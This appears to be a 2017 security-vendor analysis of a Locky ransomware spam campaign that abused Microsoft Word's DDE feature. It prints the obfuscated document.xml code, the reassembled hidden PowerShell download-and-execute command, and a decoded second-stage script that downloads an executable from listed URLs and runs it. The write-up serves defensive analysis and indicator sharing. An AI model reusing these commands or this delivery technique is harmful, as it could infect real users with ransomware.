The actors behind the Locky Ransomware family have adopted the recent highly publicized Dynamic Data Exchange (DDE) protocol vulnerability to deliver their malware. The DDE technique has been around for some time, but it was recently brought to attention by the people over at SensePost on October 9, 2017. The technique essentially allows for code execution in the context of Microsoft Word without the use of malicious VBA macros.
Other criminals have already started using the DDE technique. The Hancitor malware authors, who often use links to malicious documents in spam emails, adapted their malware documents to use the DDE technique on Monday, October 16. The Hancitor campaign was detailed here.
Today’s campaign involved spam emails distributed by the Necurs botnet with the Subject: “Emailed Invoice – [random digits]” delivered with a word document attached. The word document has a filename similar to I_.doc.
The Locky Ransomware actors are known to regularly rotate and innovate through many new and different tactics to deliver their malware. There was no Locky activity on Monday or Tuesday of this week (October 16-17, 2017). We presume they took that time weaponizing this DDE feature in order to deliver today’s attacks.
Analysis of Malicious Document Delivering Locky Ransomware
The actual DDE code is in the word/document.xml component of the document. This component is an WordprocessingML, or an XML Document 2003 file consisting of multiple XML entities. The format of the document.xml file used in this attack is actually quite similar to those used in the Hancitor campaign earlier this week.
The malware authors used an interesting technique also used in the Hancitor campaign to obfuscate the malicious commands used to download the second and third stage of the attack. The obfuscation makes heavy use of the Rsid (Revision Identifier for Style Definition) class. This is a feature built in to OpenXML that allows for effective merging of documents that have forked. As a result, they are able to break up the malicious powershell command over several <w:instrText/> elements.
Below you can see a snippet of the actual document.xml file where the malicious code has been embedded. First you can see the DDE command:
<w:r w:rsidR="001E224B">
<w:instrText>DDE</w:instrText>
</w:r>
The powershell download and execute routine follows. All of the rsidR elements have been removed for brevity:
<w:instrText>C:\\Windows\\System32\\</w:instrText>
<w:instrText>cmd</w:instrText>
<w:instrText>.exe</w:instrText>
<w:instrText xml:space="preserve"></w:instrText>
<w:instrText>"</w:instrText>
<w:instrText xml:space="preserve">/k </w:instrText>
<w:instrText xml:space="preserve">powershell </w:instrText>
<w:instrText xml:space="preserve">-NoP -sta -NonI </w:instrText>
<w:instrText>-w hidden</w:instrText>
<w:instrText xml:space="preserve">
</w:instrText>
<w:instrText>$e=</w:instrText>
<w:instrText>(New-Object System.Net.WebClient).DownloadString('</w:instrText>
<w:instrText>http://ryanbaptistchurch.com/KJHDhbje71</w:instrText>
The actual command used when extracted from the multiple instrText elements looks like this:
DDE C:\\Windows\\System32\\cmd.exe "/k -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71'); powershell -e $e"
The above code downloads the second stage of the attack which is a base64 encoded file from:
hxxp://ryanbaptistchurch.com/KJHDhbje71
The contents of that file (after base64 decoding) is a small powershell script:
$urls = "http://shamanic-extracts.biz/eurgf837or","http://centralbaptistchurchnj.org/eurgf837or","","http://conxibit.com/eurgf837or"
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\rekakva32.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}
In the above code we can see a basic download and execute routine which downloads the third stage binary. In our analysis we found the third stage to be a PE32 executable, MD5: 4f03e360be488a3811d40c113292bc01. This next stage binary is known as QTLoader, which we will describe in another post.
Please visit our Locky IOC page for a constantly updated feed of Locky Ransomware Indicators of Compromise.
